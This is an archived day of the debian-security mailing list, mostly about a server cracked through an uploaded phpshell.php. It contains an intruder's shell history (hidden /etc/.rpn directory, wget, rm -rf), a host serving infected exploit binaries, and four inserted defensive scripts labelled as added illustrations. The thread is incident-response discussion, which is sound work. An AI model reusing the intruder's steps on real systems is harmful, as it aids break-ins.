Re: Strange segmentation faults and Zombies

2003-09-18 Thread Michel Messerschmidt
On Thu, Sep 18, 2003 at 07:20:08PM +0200, Javier Fernández-Sanguino Peña wrote:
> > www.slacks.hpg.ig.com.br/bin/rh  Infection: Unix/Osf.A
> 
> This is an exploit to an OpenSSL bug.
> 
> > www.slacks.hpg.ig.com.br/bin/mass  Infection: Unix/Osf.A
> 
> This is a 'massive' scanner
> 
> > www.slacks.hpg.ig.com.br/bin/co1  Infection: Unix/Osf.A
> 
> This is another OpenSSL exploit (written in Portuguese)
> 
> > www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/makesalt  Infection: Unix/Osf.A
> > www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/psybnc  Infection: Unix/Osf.A
> 
> Both of these are programs to set up IRC daemons and relays IIRC. See:
> http://www.honeynet.org/scans/scan28/
> 
> > 
> > But AFAIK none of these viruses is able to get root rights, so the attacker 
> > must have got root rights before.
> 
> Well, they are not virus themselves. The fact that f-prot labels them as
> such is that they usually are part of some massrooter, worm or trojan, but
> they can be (and are) used independently.

Be careful!
These files are really infected and will infect other ELF binaries if
you execute them (and if user rights allow it). 
I've done replication tests for all of them to confirm this.

Michel


PS: Non-viral malware is usually reported differently by f-prot
(e.g. as "is a security risk or a backdoor program")
-- 
Michel Messerschmidt   [EMAIL PROTECTED]
antiVirusTestCenter, Computer Science, University of Hamburg


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Sendmail package version weirdness

2003-09-18 Thread Matt Zimmerman
On Thu, Sep 18, 2003 at 10:58:49PM -0400, Robert Brockway wrote:

> Was there any particular reason that this newer fixed version has a
> version number that makes it look older than the exploitable version?

Simple: it doesn't.  The version in stable is 8.12.3-4, and the version on
security.debian.org is 8.12.3-6.6.  Your package came from someplace else.

-- 
 - mdz



Re: Remote update of ssh(d)

2003-09-18 Thread Matt Zimmerman
On Thu, Sep 18, 2003 at 09:12:45PM +0200, Bernd Eckenfels wrote:
> In article <[EMAIL PROTECTED]> you wrote:
> > I found the problem: The file /var/run/sshd.pid was missing.
> 
> Well, this raises the question, since failed restarts of daemons are quite
> common because there are simply too many errors which can happen, whether we
> should add some kind of post-update stale-executable checker, meaning a program
> which will list all running programs with no file on disk and especially
> those with listening ports. I think even tiger does not have that check.
> 
> Checksecurity and tiger can do this; apt could also call a script, especially
> after security updates.

apt-get install debian-goodies && checkrestart

-- 
 - mdz



Re: Sendmail package version weirdness

2003-09-18 Thread Jeremy T. Bouse
On Fri, Sep 19, 2003 at 01:47:28AM -0400, Robert Brockway wrote:
> On Fri, 19 Sep 2003, Matt Zimmerman wrote:
> 
> > On Thu, Sep 18, 2003 at 10:58:49PM -0400, Robert Brockway wrote:
> >
> > > Was there any particular reason that this newer fixed version has a
> > > version number that makes it look older than the exploitable version?
> >
> > Simple: it doesn't.  The version in stable is 8.12.3-4, and the version on
> > security.debian.org is 8.12.3-6.6.  Your package came from someplace else.
> 
> Hi Matt.  Thanks for clearing that up.  FYI I located the origin of the
> version I was using:
> 
> http://people.debian.org/~cowboy/sendmail_8.12.3-7woody_i386.changes
> 
Just like anyone using debian.seabone.net for the debian-ipv6
repository for woody would have 8.12.9-3 installed... 

Regards,
Jeremy

> Rob
> 
> -- 
> Robert Brockway B.Sc. email: [EMAIL PROTECTED], [EMAIL PROTECTED]
> Linux counter project ID #16440 (http://counter.li.org)
> "The earth is but one country and mankind its citizens" -Baha'u'llah
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 




Re: Sendmail package version weirdness

2003-09-18 Thread Robert Brockway
On Fri, 19 Sep 2003, Matt Zimmerman wrote:

> On Thu, Sep 18, 2003 at 10:58:49PM -0400, Robert Brockway wrote:
>
> > Was there any particular reason that this newer fixed version has a
> > version number that makes it look older than the exploitable version?
>
> Simple: it doesn't.  The version in stable is 8.12.3-4, and the version on
> security.debian.org is 8.12.3-6.6.  Your package came from someplace else.

Hi Matt.  Thanks for clearing that up.  FYI I located the origin of the
version I was using:

http://people.debian.org/~cowboy/sendmail_8.12.3-7woody_i386.changes

Rob

-- 
Robert Brockway B.Sc. email: [EMAIL PROTECTED], [EMAIL PROTECTED]
Linux counter project ID #16440 (http://counter.li.org)
"The earth is but one country and mankind its citizens" -Baha'u'llah


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Sendmail package version weirdness

2003-09-18 Thread Robert Brockway
Hi all.  I took preventative measures to protect my exploitable sendmail
until I could get the new package installed on my mail server (running
Debian Stable).  I did the usual sudo apt-get update && sudo apt-get
upgrade but wasn't seeing the new package.

A little bit of investigation showed the problem.  The version I was
running (exploitable) was 8.12.3-7woody, so when I tried to upgrade to the
newer fixed version (8.12.3-6.6) it was always seeing this as an older
version & failing to install it.

Was there any particular reason that this newer fixed version has a
version number that makes it look older than the exploitable version?
Surely this will make life harder for people wanting to upgrade since the
normal apt-get method will fail.  Was it just a mess-up with version
numbering? :)  If it was I'd suggest the fixed sendmail be re-issued with
a higher version number to fix the problem.

Thanks again, must have been a busy few days for you :)

Cheers,
Rob

-- 
Robert Brockway B.Sc. email: [EMAIL PROTECTED], [EMAIL PROTECTED]
Linux counter project ID #16440 (http://counter.li.org)
"The earth is but one country and mankind its citizens" -Baha'u'llah



Re: ***DEB*: Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread ICTO-Balie



> > rm -rf phpshell.php
> >
> >   ^__^
> > was this the exploited hole ?
>
> I think so. In fact the problem is that it got there...

probably uploaded somehow...
an upload-form, some web-script maybe?

check php permissions I'd say.
where was the php-file located? do you know?

good luck, Jst.




Tiger (was: Remote update of ssh(d))

2003-09-18 Thread Bernd Eckenfels
In article <[EMAIL PROTECTED]> you wrote:
> Ummm... Tiger does have it, it's called 'check_finddeleted'. I wrote it
> after reading an excellent article by Brian Hatch on this precise issue.

Just a minor note, I think tiger is getting better and better, I really start
to love it. Especially since it is pretty lightweight and nevertheless
produces good and important reports.

> It's available in 3.2 but was not added to the cronrc file due to an
> oversight. That is fixed in 3.2.1 (but I have not found time to make new
> packages for it yet, sorry)

Thanks for your work on that... and expect some more bug reports from me :)

Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/



Re: Remote update of ssh(d)

2003-09-18 Thread Javier Fernández-Sanguino Peña
On Thu, Sep 18, 2003 at 09:12:45PM +0200, Bernd Eckenfels wrote:
> In article <[EMAIL PROTECTED]> you wrote:
> > I found the problem: The file /var/run/sshd.pid was missing.
> 
> Well, this raises the question, since failed restarts of daemons are quite
> common because there are simply too many errors which can happen, whether we
> should add some kind of post-update stale-executable checker, meaning a program
> which will list all running programs with no file on disk and especially
> those with listening ports. I think even tiger does not have that check.

Ummm... Tiger does have it, it's called 'check_finddeleted'. I wrote it
after reading an excellent article by Brian Hatch on this precise issue.

It's available in 3.2 but was not added to the cronrc file due to an
oversight. That is fixed in 3.2.1 (but I have not found time to make new
packages for it yet, sorry)

Regards

Javi




Re: Remote update of ssh(d)

2003-09-18 Thread Bernd Eckenfels
In article <[EMAIL PROTECTED]> you wrote:
> I found the problem: The file /var/run/sshd.pid was missing.

Well, this raises the question, since failed restarts of daemons are quite
common because there are simply too many errors which can happen, whether we
should add some kind of post-update stale-executable checker, meaning a program
which will list all running programs with no file on disk and especially
those with listening ports. I think even tiger does not have that check.

Checksecurity and tiger can do this; apt could also call a script, especially
after security updates.

Greetings
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/
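Added illustration, not part of the original thread: the "post-update stale-executable checker" described above (list running programs whose file on disk is gone, and flag the ones with listening ports) written out as a Python script. It is an added example, not the code of checkrestart or of Tiger's check_finddeleted, and it assumes the Linux /proc layout: /proc/<pid>/exe and /proc/<pid>/maps carry a " (deleted)" suffix once the backing file was unlinked (which is exactly what a package upgrade does), and /proc/net/tcp lists LISTEN sockets by inode. The SAMPLE_* inputs are constructed for the demonstration; seeing other users' processes needs root.

```python
"""Stale-executable checker over /proc (added example, not checkrestart's code)."""
import os
from dataclasses import dataclass, field

# --- constructed sample input, shaped like the real /proc files ---
SAMPLE_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10001 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10002 1 0000000000000000 100 0 0 10 0
   2: 0A000002:0016 0A000001:C350 01 00000000:00000000 00:00000000 00000000     0        0 10003 1 0000000000000000 20 4 30 10 -1
"""
SAMPLE_MAPS = """\
08048000-08060000 r-xp 00000000 03:01 4711       /usr/sbin/sshd (deleted)
40000000-40015000 r-xp 00000000 03:01 1234       /lib/ld-2.2.5.so
4001a000-40130000 r-xp 00000000 03:01 5678       /usr/lib/libcrypto.so.0.9.6 (deleted)
bfffe000-c0000000 rwxp 00000000 00:00 0          [stack]
"""
TCP_LISTEN = "0A"   # socket state code used by /proc/net/tcp


@dataclass
class Finding:
    pid: int
    exe: str
    stale_exe: bool                                 # the binary itself was unlinked/replaced
    deleted: list = field(default_factory=list)     # mapped files that are gone from disk
    ports: list = field(default_factory=list)       # TCP ports this process listens on


def listening_sockets(proc_net_tcp: str) -> dict:
    """Map socket inode -> local port for every LISTEN entry in /proc/net/tcp{,6}."""
    result = {}
    for line in proc_net_tcp.splitlines()[1:]:      # first line is the column header
        parts = line.split()
        if len(parts) > 9 and parts[3] == TCP_LISTEN:
            port = int(parts[1].rsplit(":", 1)[1], 16)
            result[parts[9]] = port
    return result


def deleted_mappings(maps_text: str) -> set:
    """File-backed mappings in /proc/<pid>/maps whose backing file is gone."""
    gone = set()
    for line in maps_text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue                                # anonymous mapping, no path column
        path = parts[5]
        if path.startswith("/") and not path.startswith("/dev/") and path.endswith(" (deleted)"):
            gone.add(path[: -len(" (deleted)")])
    return gone


def exe_is_stale(exe_link_target: str) -> bool:
    """/proc/<pid>/exe keeps the old path and appends ' (deleted)' after unlink."""
    return exe_link_target.endswith(" (deleted)")


def assess(pid: int, exe: str, maps_text: str, fd_targets, listen: dict):
    """Pure part of the check: combine one process's exe link, maps and fd link
    targets with the listening-socket table.  Returns a Finding or None."""
    stale = exe_is_stale(exe)
    gone = deleted_mappings(maps_text)
    if not stale and not gone:
        return None
    inodes = [t[len("socket:["):-1] for t in fd_targets if t.startswith("socket:[")]
    ports = sorted(listen[i] for i in inodes if i in listen)
    return Finding(pid, exe, stale, sorted(gone), ports)


def scan_proc(proc: str = "/proc"):
    """Walk /proc on the live system; processes we cannot read are skipped."""
    listen = {}
    for name in ("tcp", "tcp6"):
        try:
            with open(f"{proc}/net/{name}") as f:
                listen.update(listening_sockets(f.read()))
        except OSError:
            pass
    findings = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            exe = os.readlink(f"{proc}/{pid}/exe")
            with open(f"{proc}/{pid}/maps") as f:
                maps = f.read()
            fds = [os.readlink(f"{proc}/{pid}/fd/{fd}") for fd in os.listdir(f"{proc}/{pid}/fd")]
        except OSError:
            continue                                # kernel thread, vanished process, or not ours
        hit = assess(pid, exe, maps, fds, listen)
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for hit in scan_proc():
        flag = "LISTENING " if hit.ports else ""
        print(f"{flag}pid {hit.pid} {hit.exe} ports={hit.ports} deleted={hit.deleted}")
```

A daemon flagged with a listening port is the case the thread worries about: sshd still serving the old, vulnerable code after the package on disk was replaced. Run the check after every security update and restart what it lists.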



Re: Strange segmentation faults and Zombies

2003-09-18 Thread Javier Fernández-Sanguino Peña
On Thu, Sep 18, 2003 at 07:02:06PM +0200, Michel Messerschmidt wrote:
> 
> Might be a side effect of the tools that were used.
> A quick scan with f-prot shows several infected files on the server 
> www.slacks.hpg.ig.com.br: 
()
> www.slacks.hpg.ig.com.br/bin/rh  Infection: Unix/Osf.A

This is an exploit to an OpenSSL bug.

> www.slacks.hpg.ig.com.br/bin/mass  Infection: Unix/Osf.A

This is a 'massive' scanner

> www.slacks.hpg.ig.com.br/bin/co1  Infection: Unix/Osf.A

This is another OpenSSL exploit (written in Portuguese)

> www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/makesalt  Infection: Unix/Osf.A
> www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/psybnc  Infection: Unix/Osf.A

Both of these are programs to set up IRC daemons and relays IIRC. See:
http://www.honeynet.org/scans/scan28/

> 
> But AFAIK none of these viruses is able to get root rights, so the attacker 
> must have got root rights before.

Well, they are not virus themselves. The fact that f-prot labels them as
such is that they usually are part of some massrooter, worm or trojan, but
they can be (and are) used independently.

Regards

Javi




Re: Strange segmentation faults and Zombies

2003-09-18 Thread Michel Messerschmidt

Diego Brouard writes:

> As you've seen you have been cracked by a "worm", it's called
> RST.b.
>
> In a few words, it infects executable files in /bin and in the current directory
> from where you are executing an already infected binary. You were infected
> because of a php bug and the ptrace bug.

Might be a side effect of the tools that were used.
A quick scan with f-prot shows several infected files on the server
www.slacks.hpg.ig.com.br:

www.slacks.hpg.ig.com.br/bin/telnetd  Infection: Unix/RST.B
www.slacks.hpg.ig.com.br/bin/sslscan  Infection: Unix/RST.B
www.slacks.hpg.ig.com.br/bin/rh  Infection: Unix/Osf.A
www.slacks.hpg.ig.com.br/bin/mass  Infection: Unix/Osf.A
www.slacks.hpg.ig.com.br/bin/co1  Infection: Unix/Osf.A
www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/makesalt  Infection: Unix/Osf.A
www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/psybnc  Infection: Unix/Osf.A

But AFAIK none of these viruses is able to get root rights, so the attacker 
must have got root rights before.




Re: Strange segmentation faults and Zombies

2003-09-18 Thread Andrew Sayers
On Wed, Sep 17, 2003 at 11:52:36PM +0200, Laurent Corbes {Caf'} wrote:
> 
> I'm thinking about a hardware problem.
> Maybe the hard drive is failing (get the output of dmesg) or there is a very big
> RAM problem that corrupts files on the hard drive.

By the sound of things, this is starting to sound more like an exploit,
but you might be interested to know that broken hard disks can often be
detected with SMART.  You can use "ide-smart" with stable or
"smartmontools" with testing/unstable to get information about
SMART-enabled disk drives.  Then again, if you suspect tampering or
hardware failure, you should overreact first (copy the data out to
another system) and analyse later.

- Andrew




Re: Strange segmentation faults and Zombies

2003-09-18 Thread Diego Brouard
On Wednesday, 17 September 2003 21:29, Markus Schabel wrote:
> Hello!
>
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaulted.
> I've copied gzip from another server over the version on this server,
> but it also crashed. Interestingly, the executable was bigger
> after the segfault.

As you've seen you have been cracked by a "worm", it's called
RST.b.

In a few words, it infects executable files in /bin and in the current directory
from where you are executing an already infected binary. You were infected
because of a php bug and the ptrace bug.

There is lots of info out there if you "google" the internet. You can avoid
reinstalling the server if you work carefully.

good luck


-- 


Red JABBER   www.jabber.org

JID [EMAIL PROTECTED]
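Added illustration, not part of the original thread: the symptom reported above (gzip grew after it "segfaulted", and a freshly copied gzip got infected too) is what an ELF infector like the one discussed leaves behind, and dpkg's own records are enough to spot it. Every installed package leaves a <package>.md5sums file under /var/lib/dpkg/info listing the digest of each file it installed, which is what the debsums tool compares against. The script below is an added example, not debsums' or dpkg's code; it parses that file format, reports each file as ok, MODIFIED or missing, and uses a constructed "gzip" package with an appended payload as sample data. Run it from a clean system against the suspect disk mounted read-only (the root= argument): on a rooted box the python binary, hashlib and the md5sums files themselves may be lying, which is the point made elsewhere in the thread about copying data out first and analysing later.

```python
"""Verify installed files against dpkg's recorded md5sums (added example, not debsums' code)."""
import hashlib
import os

MD5SUMS_DIR = "/var/lib/dpkg/info"      # one <package>.md5sums file per package


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def parse_md5sums(text: str) -> dict:
    """'<32 hex digits>  <path relative to />' per line -> {'/abs/path': digest}."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        digest, rel = line.split(None, 1)
        entries["/" + rel.strip()] = digest.lower()
    return entries


def verify(entries: dict, read_file) -> dict:
    """read_file(path) returns the file's bytes, or None if it is missing.
    Returns {path: 'ok' | 'MODIFIED' | 'missing'}."""
    report = {}
    for path, expected in entries.items():
        data = read_file(path)
        if data is None:
            report[path] = "missing"
        elif md5_hex(data) != expected:
            report[path] = "MODIFIED"
        else:
            report[path] = "ok"
    return report


def verify_system(root: str = "/", info_dir: str = MD5SUMS_DIR) -> dict:
    """Verify every package's md5sums under 'root' (e.g. a mounted image)."""
    info_path = os.path.join(root, info_dir.lstrip("/"))

    def read_file(path):
        try:
            with open(os.path.join(root, path.lstrip("/")), "rb") as f:
                return f.read()
        except OSError:
            return None

    report = {}
    for name in sorted(os.listdir(info_path)):
        if name.endswith(".md5sums"):
            with open(os.path.join(info_path, name)) as f:
                report.update(verify(parse_md5sums(f.read()), read_file))
    return report


# --- constructed sample: a tiny 'gzip' package and what the infected box holds ---
CLEAN_FILES = {
    "/bin/gzip": b"\x7fELF-pretend-gzip-binary\n",
    "/bin/gunzip": b"#!/bin/sh\nexec gzip -d \"$@\"\n",
    "/usr/share/doc/gzip/README": b"gzip for Debian\n",
}
# the md5sums file as dpkg would have written it at install time
SAMPLE_MD5SUMS = "".join(f"{md5_hex(d)}  {p[1:]}\n" for p, d in CLEAN_FILES.items())
ON_DISK = dict(CLEAN_FILES)
ON_DISK["/bin/gzip"] += b"\x00infector payload appended\x00"   # bigger after the 'segfault'
del ON_DISK["/usr/share/doc/gzip/README"]                         # removed by the intruder


def demo() -> dict:
    """Run the check over the constructed sample instead of the live root."""
    return verify(parse_md5sums(SAMPLE_MD5SUMS), ON_DISK.get)


if __name__ == "__main__":
    for path, status in demo().items():
        print(f"{status:9} {path}")
```

The md5sums files cover what the package shipped, not configuration files, so a clean report only says the shipped binaries are untouched; a binary that is modified is reason enough to treat the whole host as compromised, as the thread concludes.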



Postfix and SSL

2003-09-18 Thread Konstantin
hi,

I want to setup postfix with SSL.

On the Inet I found only tutorials for postfix v2.0.
Stable uses postfix v1.1 and I couldn't find any information about postfix
1.1 and SSL.


thx for help

Konstantin





RE: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Christian Storch
>> - perl without tainting checks in cgi-bin?
>
>what exactly do you mean? how can i do/check that?
>

Use '#!/usr/local/bin/perl -T' at the beginning of a Perl CGI.

Probably it would end in some 'tainted' errors you have to solve.
For further details look into 'man perlsec'.

Christian



Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Matt Zimmerman
On Thu, Sep 18, 2003 at 03:02:04PM +0200, Markus Schabel wrote:

> Christian Storch wrote:
> >- security updates all up to date?
> 
> the same state as DSA announcements

Including your kernel?

> >- known unclosed security hole?
> 
> It seems that it was possible to upload & execute .php-files somewhere
> (phpshell.php)

Yes, this would appear to be how they got a shell, but not root (which they
clearly had also).

-- 
 - mdz



Re: Strange segmentation faults and Zombies

2003-09-18 Thread Matt Zimmerman
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:

> in the directory /var/www/cncmap/www/upload/renegade there are the
> following files: backhole.pl
> e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, 
> LES-EXPLOIT for Linux x86")
> rem.php (phpRemoteView)
> 
> so we got hacked :(

You must not allow users to upload files to locations where they can be
executed as programs by the web server (such as PHP, CGI, etc.).  This
configuration is easily abused to gain arbitrary access to the system.

I'd be interested in finding out how they got from www-data to root, though
(assuming your system is up-to-date with security updates).

-- 
 - mdz



Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Stefan Neufeind
On 18 Sep 2003 at 15:02, Markus Schabel wrote:

> Christian Storch wrote:
> > The problem is starting >>before<<
> 
> I think all the things >>before<< phpshell.php are done via
> phpshell.php and the things you can see in the .bash_history
> are only the things after he already got in.
> 
[...]
> > - known unclosed security hole?
> 
> It seems that it was possible to upload & execute .php-files somewhere
> (phpshell.php)

Maybe a directory-traversal thing when using a certain form provided
on a webpage to upload files? Check your scripts. It's quite easy to
open such security holes - be careful with file uploads.

   Stefan

> > -Original Message-
> > From: Markus Schabel [mailto:[EMAIL PROTECTED]
> > Sent: Thursday, September 18, 2003 12:23 PM
> > To: debian-security@lists.debian.org
> > Subject: Re: [sec] Re: Strange segmentation faults and Zombies
> > 
> > maximilian attems wrote:
> > 
> >>On Thu, 18 Sep 2003, Christian Storch wrote:
> >>
> >>
> >>
> >>>Don't forget to try to find the potential hole first!
> >>>Otherwise you could have a fast recurrence.
> >>>[..]
> >>>
> >>>
> >in /etc/.rpn theres a .bash_history with the following content:
> >
> >
> >>id
> >>mkdir /etc/.rpn
> >>ps -aux
> >>ps -aux | grep tbk
> >>kill -15292 pid
> >>kill 15292
> >>netconf
> >>locate httpd.conf
> >>cd /etc/.rpn
> >>ls -al
> >>wget
> >>cd /var/www/cncmap/www/upload/renegade
> >>ls -al
> >>rm -rf phpshell.php
> >>
> >>  ^__^
> >>was this the exploited hole ?
> > 
> > 
> > I think so. In fact the problem is that it got there...
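Added illustration, not part of the original thread: the two rules the thread arrives at for upload forms, put into code. Matt's point is that uploads must land where the web server will never run them as PHP or CGI; Stefan's is that the client-supplied file name must not be able to walk out of the upload directory. The script below is an added example, not code from the compromised server; UPLOAD_ROOT (a directory outside /var/www, served back only through an application handler) and the extension allowlist are assumptions for the illustration. The server chooses the stored file name itself, so the client's name never reaches the filesystem, and the path is still checked against the root as a second line of defence.

```python
"""Upload handling that neither trusts the client's path nor stores executables
(added example; the paths and allowlist are assumptions)."""
import os
import secrets
import tempfile

UPLOAD_ROOT = "/var/lib/cncmap/uploads"                  # assumed: outside the document root
ALLOWED_EXT = {".png", ".jpg", ".gif", ".txt", ".pdf"}   # allowlist; never .php/.pl/.cgi


def accepted_extension(client_name: str):
    """Return the lower-cased extension if the client's file name is acceptable,
    else None.  Only the last path component counts ('../' cannot survive),
    hidden files are refused, and so are names with more than one dot such as
    shell.php.png, which some AddHandler setups still pass to the PHP interpreter."""
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1].strip()
    if not base or base.startswith(".") or base.count(".") != 1:
        return None
    ext = os.path.splitext(base)[1].lower()
    return ext if ext in ALLOWED_EXT else None


def is_within(root: str, candidate: str) -> bool:
    """True if 'candidate' resolves to a file directly under 'root'.
    realpath() collapses '..' and symlinks, and comparing the whole parent
    directory stops '/srv/uploads2/x' from passing as '/srv/uploads'."""
    return os.path.dirname(os.path.realpath(candidate)) == os.path.realpath(root)


def store_upload(upload_root: str, client_name: str, data: bytes) -> str:
    """Write 'data' under upload_root using a server-generated name and return
    the path, or raise ValueError.  The file is created mode 0640 (no execute
    bit) with O_EXCL, so an existing file is never overwritten."""
    ext = accepted_extension(client_name)
    if ext is None:
        raise ValueError(f"upload rejected: {client_name!r}")
    target = os.path.join(upload_root, secrets.token_hex(16) + ext)
    if not is_within(upload_root, target):          # defence in depth; cannot trigger with a random name
        raise ValueError("upload path escapes the upload root")
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return target


def self_check() -> dict:
    """Exercise the rules against a throw-away directory; returns what happened."""
    root = tempfile.mkdtemp()
    stored = store_upload(root, "cat.png", b"\x89PNG\r\n")
    return {
        "stored_in_root": is_within(root, stored),
        "has_exec_bit": bool(os.stat(stored).st_mode & 0o111),
        "traversal_rejected": accepted_extension("../../var/www/shell.php") is None,
        "double_ext_rejected": accepted_extension("shell.php.png") is None,
    }


if __name__ == "__main__":
    print(self_check())
```

Serving the files back goes through a handler that reads from UPLOAD_ROOT and sets the Content-Type from the allowlisted extension, never through a directory the web server maps to a URL, so even a file that slipped past the allowlist is delivered as data rather than executed.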



Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel

Christian Storch wrote:

> The problem is starting >>before<<

I think all the things >>before<< phpshell.php are done via
phpshell.php and the things you can see in the .bash_history
are only the things after he already got in.

> > id
> > mkdir /etc/.rpn
> > ...
>
> you should think about all what's listening on a port:
> - an outdated sshd? (!)

It was a NOW outdated sshd but I believe that the new packages weren't
available on Sunday - after getting the DSA-mails I usually update my
systems.

> - security updates all up to date?

the same state as DSA announcements

> - known unclosed security hole?

It seems that it was possible to upload & execute .php-files somewhere
(phpshell.php)

> - some nice scripts like 'rootshell.php'? ;)

no. at least not found till now.

> - perl without tainting checks in cgi-bin?

what exactly do you mean? how can i do/check that?

thanks, markus

> etc.
> etc.
>
> Christian
>
> -Original Message-
> From: Markus Schabel [mailto:[EMAIL PROTECTED]
> Sent: Thursday, September 18, 2003 12:23 PM
> To: debian-security@lists.debian.org
> Subject: Re: [sec] Re: Strange segmentation faults and Zombies
>
> maximilian attems wrote:
>
> > On Thu, 18 Sep 2003, Christian Storch wrote:
> >
> > > Don't forget to try to find the potential hole first!
> > > Otherwise you could have a fast recurrence.
> > > [..]
>
> in /etc/.rpn there's a .bash_history with the following content:
>
> > id
> > mkdir /etc/.rpn
> > ps -aux
> > ps -aux | grep tbk
> > kill -15292 pid
> > kill 15292
> > netconf
> > locate httpd.conf
> > cd /etc/.rpn
> > ls -al
> > wget
> > cd /var/www/cncmap/www/upload/renegade
> > ls -al
> > rm -rf phpshell.php
> >
> >   ^__^
> > was this the exploited hole ?
>
> I think so. In fact the problem is that it got there...

regards
Markus




Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Stefan Neufeind
On 18 Sep 2003 at 15:02, Markus Schabel wrote:

> Christian Storch wrote:
> > The problem is starting >>before<<
> 
> I think all the things >>before<< phpshell.php are done via
> phpshell.php and the things you can see in the .bash_history
> are only the things after he already got in.
> 
[...]
> > - known unclosed security hole?
> 
> It seems that it was possible to upload & execute .php-files somewhere
> (phpshell.php)

Maybe a directory-traversal thing when using a certain form provided 
on a webpage to upload files? Check your scripts. It's quite easy to 
open such security holes - be careful with file uploads.

   Stefan

> > -Original Message-
> > From: Markus Schabel [mailto:[EMAIL PROTECTED]
> > Sent: Thursday, September 18, 2003 12:23 PM
> > To: [EMAIL PROTECTED]
> > Subject: Re: [sec] Re: Strange segmentation faults and Zombies
> > 
> > maximilian attems wrote:
> > 
> >>On Thu, 18 Sep 2003, Christian Storch wrote:
> >>
> >>
> >>
> >>>Don't forget to try to find the potential hole first!
> >>>Otherwise you could have a fast recurrence.
> >>>[..]
> >>>
> >>>
> >in /etc/.rpn there's a .bash_history with the following content:
> >
> >
> >>id
> >>mkdir /etc/.rpn
> >>ps -aux
> >>ps -aux | grep tbk
> >>kill -15292 pid
> >>kill 15292
> >>netconf
> >>locate httpd.conf
> >>cd /etc/.rpn
> >>ls -al
> >>wget
> >>cd /var/www/cncmap/www/upload/renegade
> >>ls -al
> >>rm -rf phpshell.php
> >>
> >>  ^__^
> >>was this the exploited hole ?
> > 
> > 
> > I think so. In fact the problem is that it got there...


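Two concrete checks for the holes discussed in this thread, as an added example that is not from any of the posts above: scripts that have landed in a directory the web server lets users upload into (the phpshell.php / rem.php case), and Perl CGI scripts whose #! line does not switch taint mode on (the "perl without tainting checks in cgi-bin" question Markus asked about). The directory paths are arguments and the defaults are assumptions; the sample tree is constructed here for trying the checks offline.

```shell
#!/bin/sh
# Added example (not from the thread): audit the two web-side holes raised
# here, executable scripts dropped into a directory the web server lets
# users upload to (the phpshell.php / rem.php case) and Perl CGI scripts
# running without taint mode (the "perl without tainting checks" question).
# Directory paths are arguments; the defaults are assumptions.

# Script files that should never sit in an upload directory. Apache's
# mod_mime looks at every extension, so shell.php.jpg is served as PHP
# when .php has a handler; hence the '*.php.*' pattern.
scripts_in_upload_dir() {
    find "$1" -type f \( -name '*.php' -o -name '*.php.*' -o -name '*.php3' \
        -o -name '*.phtml' -o -name '*.pl' -o -name '*.cgi' -o -name '*.sh' \) | sort
}

# Perl CGI scripts whose #! line lacks -T. Under taint mode perl refuses to
# hand user-controlled data (CGI parameters, PATH_INFO) to system(), exec(),
# open() or unlink() until the script has explicitly untainted it.
perl_cgi_without_taint() {
    find "$1" -type f \( -name '*.pl' -o -name '*.cgi' \) | while read -r f; do
        shebang="$(head -n 1 "$f")"
        case "$shebang" in
            '#!'*perl*)
                # -T may be combined, e.g. -wT or -Tw; a lone -t is only a warning
                echo "$shebang" | grep -qE -- ' -[a-zA-Z]*T' || echo "$f"
                ;;
        esac
    done | sort
}

# Constructed sample tree so the checks can be tried offline.
make_sample_tree() {
    d="$(mktemp -d)"
    mkdir -p "$d/upload" "$d/cgi-bin"
    : > "$d/upload/map.jpg"
    : > "$d/upload/phpshell.php"
    : > "$d/upload/rem.php.jpg"
    printf '#!/usr/bin/perl -wT\nprint "ok\\n";\n' > "$d/cgi-bin/clean.pl"
    printf '#!/usr/bin/perl -w\nsystem("ls $ENV{PATH_INFO}");\n' > "$d/cgi-bin/dirty.cgi"
    printf '#!/bin/sh\necho ok\n' > "$d/cgi-bin/shell.cgi"
    echo "$d"
}

case "${1:-}" in
    --demo)
        d="$(make_sample_tree)"
        echo "scripts in upload dir:"; scripts_in_upload_dir "$d/upload"
        echo "perl CGI without -T:";   perl_cgi_without_taint "$d/cgi-bin"
        rm -rf "$d" ;;
    --audit)
        scripts_in_upload_dir "${2:-/var/www/cncmap/www/upload}"
        perl_cgi_without_taint "${3:-/usr/lib/cgi-bin}" ;;
esac
```

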